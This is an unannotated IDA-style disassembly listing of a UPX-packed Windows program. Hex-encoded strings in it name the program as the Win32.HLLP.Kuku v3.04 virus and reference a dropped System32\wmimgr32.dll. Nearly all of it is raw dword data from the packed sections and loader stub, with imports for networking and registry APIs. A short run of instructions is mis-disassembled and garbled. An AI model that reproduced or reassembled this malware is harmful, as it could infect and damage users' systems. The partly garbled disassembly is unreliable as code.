dd 80C4h, 808Ch, 3 dup(0)
dd 80D1h, 809Ch, 3 dup(0)
dd 80DEh, 80A4h, 3 dup(0)
dd 80E9h, 80ACh, 3 dup(0)
dd 80F4h, 80B4h, 3 dup(0)
dd 8100h, 80BCh, 5 dup(0)
dd 77E805D8h, 77E7A5FDh, 77E75CB5h, 0
dd 77DD189Ah, 0
dd 77C1BE00h, 0
aJW db 'jÉÔw',0
align 4
aPV db '¶¯ v',0
align 4
dd 71AB1AF4h, 0
aKernel32_dll db 'KERNEL32.DLL',0
aAdvapi32_dll db 'ADVAPI32.dll',0
aMsvcrt_dll db 'MSVCRT.dll',0
aUser32_dll db 'USER32.dll',0
aWininet_dll db 'WININET.dll',0
aWs2_32_dll db 'WS2_32.dll',0
align 4
aLoadlibrarya db 'LoadLibraryA',0
align 2
aGetprocaddress db 'GetProcAddress',0
align 2
aExitprocess db 'ExitProcess',0
align 4
aRegclosekey db 'RegCloseKey',0
dd 74610000h, 696Fh, 72707377h, 66746E69h, 41h, 65746E49h
dd 74656E72h, 6E65704Fh, 41h, 3A6h dup(0)
UPX2 ends
; Section 4. (virtual address 00009000)
; Virtual size : 00000800 ( 2048.)
; Section size in file : 00000800 ( 2048.)
; Offset to raw data for section: 00009000
; Flags C0000060: Text Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
XOR segment para public 'DATA' use32
assume cs:XOR
;org 31309000h
dd 200h dup(0)
XOR ends
; Section 5. (virtual address 0000A000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 0000A000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_QUPX1 segment para public 'CODE' use32
assume cs:_QUPX1
;org 3130A000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 0BB1h, 0B85858h, 3004010h, 0EB035BC5h, 12438589h, 6AB90040h
dd 8D000000h, 401694B5h, 0F3F88B00h, 64DB33A4h, 301E8B67h
dd 78DB8500h, 0C5B8B0Eh, 8B1C5B8Bh, 85B8B1Bh, 8B0AEBF8h
dd 5B8D345Bh, 3C5B8B7Ch, 3B8166F8h, 12755A4Dh, 7603F38Bh
dd 503E813Ch, 74000045h, 1DFE905h, 9D890000h, 40140Bh
dd 1422858Dh, 0FF500040h, 40140BB5h, 1F5E800h, 0CAE80000h
dd 89000001h, 40142F85h, 0F858D00h, 50004014h, 140BB5FFh
dd 0D8E80040h, 0E8000001h, 1ADh, 141E8589h, 858D0040h
dd 4014F1h, 2F95FF50h, 0E8004014h, 195h, 140B8589h, 0BD8D0040h
dd 401433h, 140B958Bh, 83E80040h, 6A000001h, 8695FF02h
dd 8D004014h, 4014FA85h, 95FF5000h, 40142Fh, 164E8h, 0B858900h
dd 8D004014h, 40149BBDh, 0B958B00h, 0E8004014h, 152h, 1694BD8Dh
dd 80680040h, 57000000h, 147595FFh, 0BC800040h, 40169305h
dd 1755C00h, 7B95048h, 8D000000h, 4014C6B5h, 5BC8D00h
dd 401694h, 8DA566F3h, 401694BDh, 50C03300h, 26A026Ah
dd 68504050h, 40000000h, 3F95FF57h, 89004014h, 40137B85h
dd 1A744000h, 1716BD8Dh, 54510040h, 48EA68h, 0B5FF5700h
dd 40137Bh, 145D95FFh, 0B5FF0040h, 40137Bh, 144F95FFh
dd 858D0040h, 401383h, 16949D8Dh, 6A0040h, 95FF5350h, 4014B2h
dd 48477440h, 137B8589h, 0C6580040h, 16A00584h, 8D6C0040h
dd 40138385h, 949D8D00h, 68004016h, 1001h, 95FF5350h, 4014B2h
dd 481B7440h, 137F8589h, 858B0040h, 40137Fh, 137B9D8Bh
dd 53500040h, 14A295FFh, 0B5FF0040h, 40137Fh, 14BE95FFh
dd 0B5FF0040h, 40137Bh, 14BE95FFh, 0B5FF0040h, 40140Bh
dd 149695FFh, 858D0040h, 401694h, 2F95FF50h, 0E8004014h
dd 39h, 140B8589h, 858D0040h, 4014C3h, 0BB5FF50h, 0E8004014h
dd 47h, 1CE8h, 0A2858900h, 8D004014h, 401000BDh, 95FF5700h
dd 4014A2h, 80B86158h, 0FF313071h, 74C085E0h, 0F78BC3F3h
dd 75AEC032h, 525652FDh, 141E95FFh, 0E6E80040h, 89FFFFFFh
dd 0C7835A07h, 0FF3F8004h, 0FFC3E075h, 40133DB5h, 64C03300h
dd 858D30FFh, 40136Fh, 68892089h, 409D8D04h, 89004012h
dd 67640858h, 2689h, 0C24748Bh, 4D3E8166h, 8C850F5Ah, 3000000h
dd 3E813C76h, 4550h, 7D850Fh, 7C8B0000h, 96B91024h, 32000000h
dd 8BAEF2C0h, 244C2BCFh, 78568B10h, 0C245403h, 3205A8Bh
dd 330C245Ch, 33B8BC0h, 8B0C247Ch, 51102474h, 575A6F3h
dd 0EB04C483h, 0C383590Ah, 423B4004h, 3BE27518h, 2751842h
dd 728B35EBh, 24740324h, 2BB520Ch, 33000000h, 5AE3F7D2h
dd 0C933C603h, 8B088B66h, 0D2331C7Ah, 4BBh, 0F7C18B00h
dd 244403E3h, 8BC7030Ch, 24440300h, 3302EB0Ch, 8F6764C0h
dd 83000006h, 8C204C4h, 0C800h, 10458B00h, 137735FFh, 808F0040h
dd 0B8h, 136F35FFh, 808F0040h, 0C4h, 137335FFh, 808F0040h
dd 0B4h, 0B8h, 90C3C900h, 12FFh, 4030F090h, 3130A2h, 4
dd 88000000h, 0F000001h, 43A9A037h, 49575C3Ah, 574F444Eh
dd 79535C53h, 6D657473h, 775C3233h, 676D696Dh, 2E323372h
dd 6C6C64h, 18h dup(0)
dd 47100000h, 72507465h, 6441636Fh, 73657264h, 0A5FD0073h
dd 6F4C77E7h, 694C6461h, 72617262h, 0D8004179h, 4377E805h
dd 74616572h, 6C694665h, 37004165h, 4377E7A8h, 65736F6Ch
dd 646E6148h, 6300656Ch, 5777E779h, 65746972h, 656C6946h
dd 0E79D8C00h, 74654777h, 74737953h, 69446D65h, 74636572h
dd 4179726Fh, 0E704FC00h, 74655377h, 6F727245h, 646F4D72h
dd 8C170065h, 724677E7h, 694C6565h, 72617262h, 6180079h
dd 4CFF77E8h, 706F435Ah, 1BB00079h, 5A4C1000h, 6E65704Fh
dd 656C6946h, 0B6260041h, 5A4C77EBh, 736F6C43h, 0BA180065h
dd 4BFF77EBh, 775C0075h, 676D696Dh, 2E323372h, 5F6C64h
dd 336E6957h, 4C482E32h, 4B2E504Ch, 20756B75h, 302E3376h
dd 74732034h, 2D3D6275h, 52454B3Eh, 334C454Eh, 5A4C0032h
dd 3233h, 1612120Eh, 1149495Ch, 0F481111h, 150F1008h, 30A0457h
dd 550B1407h, 48555555h, 490B0905h, 1109140Bh, 0F594953h
dd 120E0002h, 495C1612h, 3484549h, 21C0901h, 9054817h
dd 0F59490Bh, 120E0002h, 495C1612h, 53484549h, 1E5E5353h
dd 9054851h, 0F59490Bh, 120E0002h, 495C1612h, 11484549h
dd 1E100512h, 9054813h, 0F59490Bh, 120E0002h, 495C1612h
dd 66484549h, 4011602h, 9054855h, 0F59490Bh, 120E0002h
dd 495C1612h, 4484549h, 56176616h, 9054854h, 0F59490Bh
dd 120E0002h, 495C1612h, 13484549h, 111F1C51h, 9054816h
dd 0F59490Bh, 120E0002h, 495C1612h, 1C484549h, 50090510h
dd 905480Bh, 0F59490Bh, 0FFFF0002h, 4845FFFFh, 905101Ch
dd 5480B50h, 59490B09h, 0FF00020Fh, 0FFFFFFh, 29h dup(0)
dd 0FFFFFFFFh, 575C3A43h, 4F444E49h, 535C5357h, 65747379h
dd 5C32336Dh, 6D696D77h, 32337267h, 6C6C642Eh, 1E8B0700h
dd 11FCEE83h, 0B8ED72DBh, 1, 775DB01h, 0EE831E8Bh, 11DB11FCh
dd 73DB01C0h, 8B0975EFh, 0FCEE831Eh, 0E473DB11h, 0E883C931h
dd 0C10D7203h, 68A08E0h, 0FFF08346h, 0C5897474h, 775DB01h
dd 0EE831E8Bh, 11FCh, 5 dup(0)
dd 5A530000h, 0F0884444h, 413327h, 5C00h, 905A4DFFh, 300h
dd 0F5047D00h, 0FFFFF0h, 0F0F5B800h, 400101A2h, 0D0F0401h
dd 0F5C8091Ch, 1FFF0EF0h, 0B4000EBAh, 0FF21CD09h, 0CD4C01B8h
dd 69685421h, 702073FFh, 72676F72h, 206DFF61h, 6E6E6163h
dd 20FF746Fh, 72206562h, 0FF206E75h, 44206E69h, 6D20534Fh
dd 65646FFFh, 0A0D0D2Eh, 401FE24h, 0FCC65EB5h, 7DA83FF1h
dd 720574AFh, 0F5AFA623h, 93DF0075h, 0F8AFBB20h, 0AFA90275h
dd 75B37Dh, 0AFBE2019h, 3D0295F0h, 52029BACh, 74686369h
dd 0FF051C01h, 4550h, 5014Ch, 0E9ED5AEFh, 0E0051C43h, 217F0E00h
dd 6010Bh, 0F0F53A00h, 4C67C95h, 10F0F541h, 20101B5h, 2E42210h
dd 0F4F3F602h, 0F00201F5h, 0F507FDh, 0E503E2B0h, 0E3161901h
dd 6577003h, 51CFB403h, 1C640000h, 0E019490Dh, 9C008700h
dd 6D1D4907h, 0E61D7D1Dh, 1F91403h, 17A01D81h, 7865742Eh
dd 0F0F58674h, 4E238A6h, 160001D5h, 0FF200301h, 2E600000h
dd 74616472h, 614Fh, 0E9115DB0h, 0F0F50801h, 1BA03ED9h
dd 2E400008h, 340013DAh, 0F0F56755h, 0AF0F560h, 0EE46F0F5h
dd 0C0007F1Dh, 72616853h, 0C5103C65h, 0D0010114h, 3E91411h
dd 2EF019F3h, 6C65721Fh, 2A636Fh, 105911E9h, 5222101Ah
dd 42002D3Eh, 2D871DA0h, 0A7002D97h, 0C72DB72Dh, 0E72DD72Dh
dd 72DF72Dh, 3D173Dh, 3D373D27h, 3D573D47h, 3D773D67h
dd 3D973D87h, 0B73DA7E0h, 0D73DC73Dh
db 3Dh, 0E0h, 35h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
inc dword ptr [ebx+9EB08ECh]
mov eax, [ebp+8]
inc dword ptr [ebx+458901C0h]
or [ebx+0F08FF4Dh], cl
mov esi, 74D28511h
popa
; ---------------------------------------------------------------------------
db 0FEh, 0F8h, 30h
; ---------------------------------------------------------------------------
mov [ebp-4], eax
mov ecx, [ebp+0Ch]
mov edi, edi ; CODE XREF: .QUPX1:loc_3130A91F�j
dec ebp
clc
jmp short loc_3130A8FE
; ---------------------------------------------------------------------------
dd 83FC558Bh, 8901C2FFh, 458BFC55h, 32FB5EF8h
db 0F8h, 8Bh
; ---------------------------------------------------------------------------
loc_3130A8FE: ; CODE XREF: .QUPX1:3130A8EA�j
dec ebp
cld
add al, 43h
push ds
and al, [eax+7Fh]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_3130A921
sbb [eax-21h], eax
movsx eax, byte ptr [edx]
mov ecx, [ebp+37h]
inc eax
adc [ebx], edi
inc edx
jz short loc_3130A91F
jmp short loc_3130A921
; ---------------------------------------------------------------------------
loc_3130A91F: ; CODE XREF: .QUPX1:3130A91B�j
jmp short near ptr loc_3130A8E6+1
; ---------------------------------------------------------------------------
loc_3130A921: ; CODE XREF: .QUPX1:3130A90B�j
; .QUPX1:3130A91D�j
mov edi, [edi+45h]
cld
cmp eax, [ebp-8]
jz short loc_3130A934
inc ebp
inc ebx
out dx, eax
test edx, edx
jnz short loc_3130A936
clc
xor bl, ch
loc_3130A934: ; CODE XREF: .QUPX1:3130A928�j
add al, 0EBh
loc_3130A936: ; CODE XREF: .QUPX1:3130A92F�j
dec dword ptr [ebx+esi+5DE58BC0h]
retn
; ---------------------------------------------------------------------------
db 0CCh
db 0DCh
dd 30F04A72h, 0F588EC81h, 0FB85C7F0h, 0F1FCFF78h, 68A10000h
dd 1000DF61h, 8B8D8B50h, 0FF8B5141h, 60B815h, 0CA15210h
dd 5040A3FEh, 506C15FFh, 89B71000h, 408C7C85h, 41B5BD83h
dd 4A751F00h, 0B0C815FFh, 99418B42h, 9868FF44h, 8D100067h
dd 52EF8055h, 0B0FC15FFh, 0CC48340h, 8D4393AEh, 4D9F804Dh
dd 8B40B0CCh, 0EB428A0Eh, 42B48B06h, 33F04B6Eh, 4DDB4493h
dd 4840F0F8h, 454DA462h, 7D83FFFCh, 47501FCh, 0EB4FC032h
dd 1201B002h, 8C5D225Dh, 36F84095h, 765D465Dh, 68FF6A4Ah
dd 0FF5118h, 44506810h, 0DD641000h, 6402B4A1h, 1012589h
dd 0ECFFC483h, 89575653h, 9F83E865h, 7500107Dh, 0AC30F80Fh
dd 80FA8C40h, 500AE452h, 4D89104Dh, 45C737E4h, 0C70101FCh
dd 0E7215D45h, 1DCF950h, 0E0411701h, 8902C283h, 8BE055DFh
dd 32FBDC45h, 4DFF8BDCh, 0E44D3BE0h, 0DF8B4873h, 55030855h
dd 834042E0h, 740DB7F8h, 340010Eh, 1160174Dh, 0AFA837Fh
dd 2AEB0275h, 3FB30F8h, 8601745h, 0C141E983h, 1204E1FBh
dd 8D014265h, 0BFFF014Ch, 8B13F183h, 3F030C55h, 0A88DC55h
dd 50E19EEBh, 0FFEF408Ch, 95B817EBh, 658BC311h, 54EFE8F9h
dd 458B645Ah, 0EF45030Ch, 0C6DCh, 4D8B6001h, 896477F0h
dd 5F01010Dh, 4A6E5B5Eh, 0C230F0FCh, 0C700A343h, 0F55D1000h
dd 0A130F0C3h, 0C06961AAh, 5AE34E35h, 0A930FB01h, 0C162B362h
dd 25E110E8h, 62CEF1FCh, 32F04570h, 66B5E820h, 0C0E8408Ch
dd 62CE408Ch, 0F1F4B999h, 83F9F77Fh, 558904C2h, 0EAE050E0h
dd 0F930F652h, 401E51h, 453BE060h, 1E73E45Fh, 67ED8EE8h
dd 0FE64F819h, 88E0400Ah, 0EBE80554h, 600AFED1h, 0E90D44C6h
dd 0B558D00h, 53CC52E8h, 0FF510170h, 80486F30h, 9504D942h
dd 6851CC10h, 15F1F980h, 5101CE14h, 0D051084Dh, 0F601253h
dd 244FFBEh, 5CF883FFh, 68D30F74h, 7840D79Ch, 40B02073h
dd 0FC7F958Dh, 52FFFFFEh, 41B636E8h, 5004C49Fh, 71A0858Dh
dd 898D744Ah, 0F071A08Dh, 51333440h, 612057CCh, 707B70C8h
dd 5D9244E0h, 80687462h, 0D240D8C0h, 95B979AFh, 20403B11h
dd 15FF749Eh, 40B024EDh, 404DC085h, 7510680Dh, 1C717027h
dd 0D7EB40B0h, 3970716Ah, 6C40B018h, 4C242h, 50A34C74h
dd 5DA72839h, 0C48153B7h, 0C070A184h, 54E16A53h, 3817F6Ah
dd 68018080h, 80D5F0F5h, 0B04853CCh, 70A1DC42h, 9B7EBD83h
dd 1C75FF81h, 0A17C85C7h, 696FEC70h, 8FE982A9h, 6A00F5h
dd 9B8DA98Bh, 44707B81h, 0A18042B0h, 95FD8B70h, 6A5281D5h
dd 4015FF40h, 6A53D3BEh, 94858D00h, 0FD8B71B1h, 5181D58Dh
dd 52E4558Bh, 829A248Bh, 13C40ACh, 3885C751h, 83DA5101h
dd 0E4458BF7h, 51E4502Bh, 5C4C73E8h, 5571DF60h, 80841A08h
dd 80800482h, 818A02E5h, 9F8D8F40h, 7D832C85h, 5900E42Bh
dd 707BE441h, 8940B034h, 8DAB4C40h, 0C5E99174h, 80EB1095h
dd 6C81EF95h, 81D580FEh, 9223E8D1h, 819B958Bh, 3040DD62h
dd 94015201h, 0E44D9215h, 4DF76226h, 90200C75h, 148BE0Fh
dd 5AF9838Fh, 0FC956174h, 74956C80h, 9570A130h, 0E786B211h
dd 9552E991h, 54946210h, 956C9021h, 4470A198h, 759C4286h
dd 0A085AB95h, 1EA4A61Eh, 94E8C4A6h, 85C77766h, 0C79275CAh
dd 9475CC85h, 0C8A04372h, 71789275h, 17E0958Dh, 72B7F283h
dd 0CFA16585h, 1E88354h, 82EEDE89h, 8D8B0FEBh, 0E98381EFh
dd 898901EBh, 81EFBDA3h, 3D257600h, 0F92918Bh, 651584BEh
dd 79708AA1h, 0EF900B75h, 0D84C681h, 6E9175E1h, 8DC3404Fh
dd 52816F95h, 17A2128Dh, 658D8D50h, 828051A1h, 9130827Fh
dd 2C813482h, 81EF42B0h, 70FB7369h, 2468734Bh, 832CF1F7h
dd 0D9A2898Dh, 202F68A2h, 0FF279239h, 916F2815h, 631A645Bh
dd 7082EE67h, 0A2F28AAEh, 8D446D87h, 573868FFh, 55B7A28Dh
dd 358573D4h, 0D457E721h, 6ED853E4h, 45C701E4h, 0CC53E4E4h
dd 0FE63707Ah, 458B0101h, 0C44589CCh, 0C47DBF83h, 0B1840F00h
dd 0FF7D51BAh, 12747AC4h, 3C47D81h, 0F1095AEh, 0F0F58E84h
dd 8351F1E9h, 65D47DEBh, 946BD492h, 0F6D8558Bh, 8BD488DFh
dd 0D84DC00Ch, 0FFEE0889h, 0DC5589B0h, 21759162h, 0DC45EB8Dh
dd 0D9D4502Bh, 1015FFA0h, 0D660ABECh, 62D23350h, 0C2950F91h
dd 0C855899Fh, 0C52215EBh, 0FE0893DBh, 83C8C22Fh, 7400C87Dh
dd 0B0B9BC09h, 0FF0F52F2h, 52804C15h, 60013ECCh, 0EBD84589h
dd 0EB50E85Ah, 95D0ED93h, 0F54AEB11h, 4518BB0h, 440DDBAh
dd 458B60ABh, 8D6007D8h, 0FADC4D0Bh, 921FD480h, 8021C34Fh
dd 6DFECD5Dh, 89DC4DC1h, 7EBD84Dh, 83C4787Eh, 7400E07Dh
dd 0C8B4EF20h, 936CC0A0h, 0FB7CA901h, 0FC1D270h, 0A1C54984h
dd 10655A70h, 64756863h, 0F5BD53D0h, 51417FC3h, 0D23330F8h
dd 0C3575F7h, 0B084061h, 3413EB43h, 274001D5h, 1203CA2Bh
dd 0FC402141h, 447EBD60h, 109520DDh, 3FF485C7h, 15858DB4h
dd 5073B1E4h, 940D5101h, 7B90A341h, 0A15277D1h, 50503314h
dd 41A80D8Bh, 0AF707B14h, 81D6F843h, 0FE419415h, 2D17B80h
dd 3328D0A3h, 0A840F050h, 0AF40DD41h, 0FAA16543h, 8E2530F8h
dd 0FC08541h, 0C4B68B84h, 0A1EC8DB1h, 0FCE18170h, 0C10383F1h
dd 1544D401h, 0BC4BE085h, 0F7D19F75h, 0EA8D034Bh, 0DDFED6F2h
dd 429DED0Eh, 4AF7D1C7h, 0EB01B03Fh, 0B3BD8348h, 0BBC05BD1h
dd 0A165BD83h, 76047500h, 0EFE632E0h, 0B3958BD9h, 3B50FBD1h
dd 172777CAh, 0E136858Bh, 713B62CEh, 725D8AA2h, 0E868467Ah
dd 2828001h, 60AB1CA1h, 5C40AC5Ah, 0C2D861A6h, 0EB3D40E2h
dd 0B0D09AE1h, 4DB1C493h, 0BAD0F50Ch, 2DFF951h, 158B2675h
dd 0C033E1EBh, 4428AFFh, 7458F883h, 0E2D35016h, 0F30A7178h
dd 4F6EA169h, 0D4E20C71h, 0FE611EDCh, 457501E6h, 0E2816050h
dd 0EAF201FEh, 1BDAF701h, 0A1BD42D2h, 88BE1EBh, 0F30ACA03h
dd 5B0A1D89h, 0D40D89F4h, 0F31AE0ECh, 4724F324h, 0DF12D74h
dd 707BE1EBh, 6040B058h, 31F0FED1h, 7400087Dh, 96026A0Eh
dd 1CE851CCh, 600872A7h, 4853A0D6h, 67BD77B4h, 87701085h
dd 448C2485h, 0C445ABC7h, 1E1CA321h, 0F5EC34A6h, 0EC285585h
dd 0A335ACF6h, 1406073Ch, 0B4F4B63Fh, 0CC54EAB4h, 0C76601E8h
dd 6FB445h, 0A1AB900h, 0D7B0BE10h, 40BDFB41h, 0A5F3408Ch
dd 39A4A566h, 0E150F0C6h, 0F4ADE854h, 0D2E461EEh, 0C81A672h
dd 17EBD3Fh, 0BB0C36E9h, 743D7750h, 7400E46Ah, 72F56847h
dd 0E0ECE025h, 20A2F56Ah, 0B1027CB3h, 719002A7h, 21019A70h
dd 880A780h, 1CE0D7Fh, 0BE6BBE9h, 15FFA35Dh, 0D8528078h
dd 30206A4Bh, 821E7493h, 0CF0481A6h, 1107060Dh, 0E5ADE9h
dd 716EB019h, 0B01A8284h, 492025C0h, 0C4F1DF99h, 0CCF1DF81h
dd 7BB84585h, 0F1DFBD83h, 30840FFFh, 81F700E5h, 10FAB87Dh
dd 23830F01h, 0BD145FDCh, 16860F10h, 0B85501E5h, 0B055893Fh
dd 8C2C858Dh, 1F40EC40h, 558D51BCh, 0DF80FED0h, 7D40ACF1h
dd 8B9237D0h, 0C181B84Dh, 0D94CF11Bh, 8B903FA1h, 4CF1DF95h
dd 61A6D4E0h, 0EDC18423h, 0D011BEE1h, 20616CB0h, 2D3A4DAh
dd 0E311BEA1h, 60AB0CE5h, 0E4C43D83h, 46B0D011h, 0D0A42061h
dd 3C51C192h, 189589D7h, 8581D6h, 0EF453B21h, 28830FB8h
dd 0BE0F16F2h, 83187F51h, 8C0F40FAh, 93206115h, 4190D868h
dd 50311E4h, 6F706C22h
dd 2DA2FD6Ch, 383D81F0h, 74455021h, 0E985FF10h, 33000009h
dd 8B7766C9h, 2039980Dh, 0E10BF981h, 0D4853BB1h, 3D83204Fh
dd 0D02039A8h, 4FC7E1B0h, 3940A020h, 0CC704620h, 0AC03E850h
dd 6DF2B2FAh, 86F7E9C0h, 0FBF1EBA1h, 9789FDD0h, 66D23322h
dd 0EC86158Bh, 0F0532039h, 0F1EB9539h, 7E01870Fh, 3328918Bh
dd 94A166C0h, 8BBB2039h, 321008Dh, 22B28BC8h, 28D2EF6Bh
dd 11E41503h, 0CF0A448Dh, 0A8685018h, 0F32AE0ECh, 0EB8EBD83h
dd 107501F1h, 2A622E3h, 0EE0D744Bh, 0D3B2169h, 72E0ECB4h
dd 15DD8B5Eh, 1503310Fh, 39E0ECB0h, 2169BE15h, 3D834A73h
dd 74E1F2B8h, 3D8341F7h, 7400311Dh, 0FBAA138h, 2058931h
dd 67BC0D8Bh, 10CA8DF1h, 32228B01h, 4834162Bh, 1DAC5532h
dd 89F2EA8Bh, 42CB3885h, 330D012Bh, 1515739Bh, 2B958933h
dd 45346701h, 8D8BE017h, 473B0121h, 48317F32h, 2195B932h
dd 0E4358D01h, 1140D8E9h, 2252D828h, 12FF22C3h, 9020D103h
dd 28F7C06Bh, 22DA0503h, 5118104Ch, 0A428E368h, 0A1217730h
dd 5033148h, 50EF312Bh, 82F92BE8h, 5C7C824h, 216AD8C9h
dd 760DB1C4h, 0CC80FA21h, 0D0155B03h, 5E82177h, 21A34302h
dd 54A12941h, 3020532h, 0F89020Fh, 0D323F702h, 0A6FD7058h
dd 0E1F44350h, 5EC43D41h, 0F0FE0ECh, 81C11085h, 0C913F56Ah
dd 62324D03h, 0A46620A0h, 26AF02Dh, 86858DF7h, 0B44DA2CFh
dd 80FBE851h, 0C51BB24h, 958D046Ah, 0A3C82DD1h, 0F588F1FCh
dd 3F1FC8Dh, 89ACD34Dh, 401C42BAh, 0E1F281h, 2B15FD39h
dd 8B0E7731h, 1F2DC845h, 6000h, 1AF2FB89h, 0A24475F3h
dd 4F51F1FCh, 0E9F02D45h, 0F6F130F4h, 0B455E38Bh, 0A15CF04Dh
dd 0AF0FF2EAh, 2396FEC2h, 0C12BE1D1h, 0EFC4558Bh, 550C8B66h
dd 33664150h, 5131C2C8h, 67533689h, 0EBA27D33h, 0DD4D8BF1h
dd 4D219CC4h, 22EF81C4h, 0AF0800h, 0A5A77700h, 40515C22h
dd 58FAD781h, 0FA214A58h, 686A817Dh, 0FC7436F3h, 50418371h
dd 0F2238AE8h, 5A01439Eh, 6A450042h, 5E8D8D6Ah, 68514183h
dd 509E76ECh, 539365h, 5D145D04h, 5D345D24h, 5D545D44h
dd 0E2D35764h, 0CC425AC8h, 95212DD0h, 0F429F1FCh, 670A05C7h
dd 817D1141h, 0BF22E328h, 0D590DB2Dh, 0F32A8E2Bh, 9605B9E9h
dd 4B416701h, 7FDEAC20h, 0C84D8B60h, 3B421603h, 0FB8EF4Dh
dd 618C9A86h, 0DF3BE455h, 850FE055h, 81607F8Eh, 0ECCCFD3Dh
dd 20E0h, 334B73E0h, 0E11630A1h, 0ED27539Bh, 78F2B2h, 0D8B344Fh
dd 9BD19334h, 66C60F53h, 158B1CCFh, 9BD1BA38h, 0CEECF753h
dd 840F64C7h, 2AB18AEDh, 9C840F33h, 3432B19Fh, 28D3840Fh
dd 3B312B21h, 311D05CDh, 40151772h, 0D2B30E4h, 3311D7Eh
dd 8D89CC4Dh, 0ADA18300h, 89401C09h, 0A1713C95h, 0C2857233h
dd 1DA3713Ch, 18304631h, 342D242h, 52CC9F55h, 29F5BFE8h
dd 0A1312B43h, 0A3217638h, 51312BD0h, 746EA5E8h, 0C713311Dh
dd 4565AF05h, 22A5106Dh, 220522C3h, 24C2037Bh, 28C96B90h
dd 8F12F603h, 1801548Dh, 323BF429h, 8F2B33F9h, 52BCC45h
dd 0B0CA2169h, 7C010063h, 0E3FFC0C3h, 850FC985h, 7E80C13Dh
dd 836624A7h, 896601C2h, 0E9EE22A9h, 503D83F7h, 74004051h
dd 54A1234Bh, 0D1A34051h, 200D212Dh, 7B49F881h, 8120158Bh
dd 8928C283h, 27008246h, 2E632D83h, 31F42A89h, 0E8A17992h
dd 7570CB00h, 0E04CFBh, 0BE0FF0C7h, 0FF21FD05h, 0F883C933h
dd 0C1940F2Eh, 0FDC18163h, 7480FA21h, 80BE0F88h, 0A8688381h
dd 24E3E043h, 25FBE34Fh, 0D7F8A279h, 8A307E01h, 0E1ECE280h
dd 7EDF60F8h, 0DBE0F19h, 7BF982D9h, 0E30D7D33h, 0EB818624h
dd 6124E30Bh, 35ED3841h, 70E14121h, 7015E850h, 82412B00h
dd 388B310Fh, 42723270h, 0D942D271h, 48E0A340h, 4B7D9331h
dd 0D03DC063h, 1C08331h, 0FA3CD49Ch, 13C44548h, 7DAEC0B4h
dd 2252D8C2h, 70C221AAh, 8128158Bh, 8D7FD003h, 3B181144h
dd 2039D405h, 0F32D76C3h, 147040F4h, 13B0CD65h, 0EB159974h
dd 8B605650h, 0AD52F104h, 0C13C02C0h, 0C4C01BA0h, 4F4A7513h
dd 709D5465h, 31DE9D64h, 920E35E7h, 222BCC55h, 55896332h
dd 0C1C972ECh, 0DC4553CAh, 0EC49D6E2h, 0B3CDD076h, 0F623BAE2h
dd 326E8B9Dh, 0E43DD458h, 8161AF38h, 80C0B4E2h, 412BD03Ch
dd 2D61AFA1h, 0AFA3A193h, 9DEE61h, 0AD0EAD64h, 2127F0C8h
dd 65322237h, 0F6292100h, 0C803C8EBh, 755BB0B1h, 0D752B055h
dd 82F21EE8h, 5599B024h, 0A348F3ACh, 10242B54h, 25FC5001h
dd 0A66A418Bh, 52B10C02h, 8D8DB53Ah, 0D1CB015Ah, 1106235h
dd 445877Eh, 50C4458Dh, 0BA344D8Bh, 880B24DAh, 0C815FFF4h
dd 0FF03103Ah, 4503B845h, 3C06BC8h, 4589664Fh, 98408EB4h
dd 0B2628B40h, 7B222B24h, 846B66A0h, 0C628F4E9h, 605DD65Dh
dd 5DF65DE6h, 94C76D06h, 0AA755363h, 3876D28h, 75CFC855h
dd 0E0E311E4h, 98BF198h, 0EB11BE0Dh, 129B3800h, 0B00A10AEh
dd 68691691h, 1447E231h, 8D103A64h, 2F118495h, 0BC458D52h
dd 96D01088h, 7114B2D0h, 92817960h, 8BC15015h, 849FD84Dh
dd 201FDC0h, 41D812DDh, 2EDD1EA3h, 0D958E8D2h, 0A2A13D17h
dd 9F0C4DD0h, 7500A182h, 0F0E2E1D0h, 0CC2F199h, 1FDC6400h
dd 6C68206Ah, 0FD81BB68h, 4DD41501h, 33103A24h, 0C3C3DDC0h
dd 0FDC758F0h, 83F3D7CEh, 0F4E3ECC4h, 0CA10368h, 0F7C0F6FEh
dd 25C01BD8h, 4F0600h, 0FF000500h, 1CE0E370h, 91FB85A7h
dd 83D0176Bh, 19745CFAh, 0B59C68D3h, 20D31681h, 8458179h
dd 89A0093Eh, 28680845h, 0D88BD017h, 6D2068D7h, 4F90D61Eh
dd 0B83E412h, 105BE47Dh, 0AF70FF9Dh, 0EB70BFD2h, 0FED85D00h
dd 86840F02h, 0B14CD1C9h, 84767ED0h, 0D0030855h, 517FFA81h
dd 0EB02766Fh, 0C6F085CFh, 0F0D11680h, 0D9A4D3E2h, 82CDD316h
dd 78A304E8h, 0D038C0E1h, 9102D3E4h, 0F883D8E3h, 8E0FC703h
dd 55A04C2Ah, 8B61D320h, 0E126A615h, 0D116C281h, 0FE888083h
dd 1DB77402h, 61BBA0A1h, 0E2520D8Bh, 0D11678C1h, 0E35F00EBh
dd 87E80575h, 152B318Ah, 0A161EB9Ch, 1605E126h, 4EE0E3D1h
dd 6A2BE47Ch, 0FDE30704h, 1B88423h, 0D1A124D1h, 0E67C23FDh
dd 0D318A40h, 0ED4C647Ch, 6980E95Ch, 68E779EDh, 0D60064C7h
dd 0DC5593BFh, 1589800Ah, 0F7DC7DF0h, 3F207D0Eh, 850C8BA0h
dd 62D39CACh, 0B8E8D1E4h, 0E264C7E4h, 1D76D192h, 150D75F1h
dd 0F06DE8D2h, 4394129h, 0D15FB07Ah, 91D21BDAh, 0E040CEA0h
dd 506940CBh, 0D2738083h, 3D83D6FEh, 10BF3E88h, 0C7277664h
dd 11F17F05h, 0D25E7E43h, 81C91BD9h, 904300E1h, 0C510A3D0h
dd 7300EB50h, 0D1B015D2h, 103FE283h, 840FD285h, 8A209099h
dd 0D1E40C80h, 89848193h, 0D1E4A1DEh, 0E6FA00E8h, 0E4425678h
dd 0E0B09AD7h, 0CEE0558Bh, 8458FB4h, 0D09CC203h, 0F72A10F5h
dd 0C7E39DDCh, 1C682265h, 0F22FD1A1h, 6119AC6h, 0E801F70Ch
